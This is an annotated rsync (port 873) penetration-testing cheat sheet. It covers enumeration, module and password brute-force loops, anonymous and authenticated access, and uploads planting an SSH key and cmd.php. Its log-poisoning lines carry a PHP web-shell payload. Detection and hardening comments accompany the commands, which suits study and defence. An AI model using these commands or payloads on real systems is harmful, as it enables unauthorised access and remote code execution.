873 - Rsync
Information
Default Port: 873
PORT STATE SERVICE
873/tcp open rsync
Enumeration
# Banner grab: an rsync daemon greets a new TCP connection with "@RSYNCD: <protocol version>".
nc -vn 192.168.1.2 873
# Same probe, killed after 0.1 s so it does not sit waiting on the open connection.
timeout 0.1 bash -c "nc -nv 192.168.1.2 873"
# Version detection (-sV) plus the default script set (-sC) on the rsync port.
nmap -sVC -p873 192.168.1.2
# Runs every NSE script whose name starts with "rsync".
nmap --script="rsync*" -p873 192.168.1.2
# Hardening: a daemon that answers here is reachable by anyone on the path; restrict it with
# "address" and "hosts allow" in rsyncd.conf, or with a host firewall.
Modules
List
list = yes (null & auth)
# An empty module name after "::" asks the daemon for its module list.
# Only modules left at "list = yes" in rsyncd.conf are returned.
rsync 192.168.1.2:: # default port (873)
rsync 192.168.1.2:: --port=1234 # daemon listening on a non-default port
rsync -6 '[fe80::a00:27ff:fe72:4cba%eth0]':: # IPv6 link-local target; the brackets separate the address from the "::"
# Same listing through the NSE script.
nmap -p873 --script="rsync-list-modules" 192.168.1.2
Brute Force
list = no (the module is left out of the listing; this only hides the name and is not access control)
Bash
Auth: NO
# Module without authentication: a candidate name counts as found when rsync exits with status 0.
# Reads /opt/common.txt line by line, requests 192.168.1.2::<name> with a 0.5 s limit and all
# output discarded, and stops at the first name that returns 0.
# Detection: every candidate is a separate connection, and the daemon logs each rejected name
# ("unknown module ... tried from <host>"), so a wordlist run shows up as a burst from one source.
# Mitigation: a hidden module still needs "auth users" and "hosts allow"; the name is not a secret.
while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt
Auth: YES
# Module with authentication: a candidate name counts as found when the exit status is anything but 5.
# rsync documents status 5 as "Error starting client-server protocol", which is what the client
# returns when the daemon answers the request with an @ERROR line.
# NOTE(review): every other status is treated as a hit, including 124 from `timeout` when the
# 0.5 s limit expires, so a reported name should be confirmed by hand.
# Detection: same pattern as any module-name guessing, a burst of rejected module requests from
# one address in the daemon log.
while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -ne 5 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt
Metasploit
❯ msfconsole -q
msf6 > use auxiliary/scanner/rsync/modules_list
msf6 auxiliary(scanner/rsync/modules_list) > set RHOSTS 192.168.1.62
msf6 auxiliary(scanner/rsync/modules_list) > options
msf6 auxiliary(scanner/rsync/modules_list) > run
[+] 192.168.1.62:873 - 1 rsync modules found: share
[*] 192.168.1.62:873 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Access
Null
# With a source and no destination, rsync only lists the module's contents; nothing is copied.
# If this works without a password prompt, the module has no "auth users" line in rsyncd.conf.
rsync 192.168.1.2::share
rsync -r 192.168.1.2::share # recursive listing of the whole module tree
Auth
# The "user@host::module" and "rsync://user@host/module" forms address the same daemon module;
# both prompt for the password of user peter.
rsync peter@192.168.1.2::share
rsync rsync://peter@192.168.1.2/share
# sshpass answers the password prompt non-interactively.
# Credential hygiene: a password given with -p is visible in the process list and in shell
# history; rsync itself can read it from --password-file or the RSYNC_PASSWORD variable.
sshpass -p 'Password1' rsync rsync://peter@192.168.1.2/share/
File Transfer
Upload
# Copies a local file into the module. The daemon accepts writes only on a module set to
# "read only = no" (modules are read-only by default), and only where the daemon's "uid"
# may write inside the module "path".
# Hardening: keep modules read-only, point "path" at a dedicated directory rather than a
# system or web root, and run transfers under an unprivileged uid/gid.
rsync id_rsa 192.168.1.2::files/root/.ssh/
rsync cmd.php rsync://peter@192.168.1.2/files/
Download
# Copies one file from the module into the current directory.
# NOTE(review): reading this path implies the module "path" covers the filesystem root and the
# daemon's uid can read root's files; confirm against rsyncd.conf and treat any key exposed this
# way as compromised.
rsync 192.168.1.2::files/root/.ssh/id_rsa .
Brute Force
Password
# Tries each line of /opt/techyou.txt as the password for user peter on module share, with a
# 0.5 s limit per attempt and all output discarded; stops at the first attempt that exits 0.
# Detection: the daemon logs each rejected attempt ("auth failed on module ...") with the
# client address, so this appears as a run of failures for one user from one source.
# Mitigation: NOTE(review): rsyncd appears to have no lockout of its own; rely on
# "hosts allow", firewall rate limits or log-driven blocking, and long random secrets.
while IFS= read -r line; do echo ${line} | timeout 0.5 sshpass -p ${line} rsync rsync://peter@192.168.1.2/share/ &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/techyou.txt
Files
/etc/rsyncd.conf # daemon config: modules, path, auth users, hosts allow, read only, list
/etc/rsyncd.secrets # "user:password" pairs in plaintext; with "strict modes" (default) it must not be readable by other users
/var/log/rsyncd.log # daemon log: connections, requested modules, auth failures
# Locate the config and secrets files when they are not at the default paths.
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
Log Poisoning
# Both commands send a PHP snippet in place of the module name. The daemon logs the module name
# a client asked for, so rsyncd.log holds client-controlled text.
# Mitigation: keep the log readable only by root or the daemon account, never let a web
# application read or include it, and alert on module names containing "<?" or other markup.
rsync '[2a02:2e02:97c0:a000:0a00:27ff:fe43:89cd]'::'<?php system($_GET["cmd"]); ?>'
rsync "[fe80::a00:27ff:fe43:89cd%eth0:]"::'<?php system($_GET["cmd"]); ?>'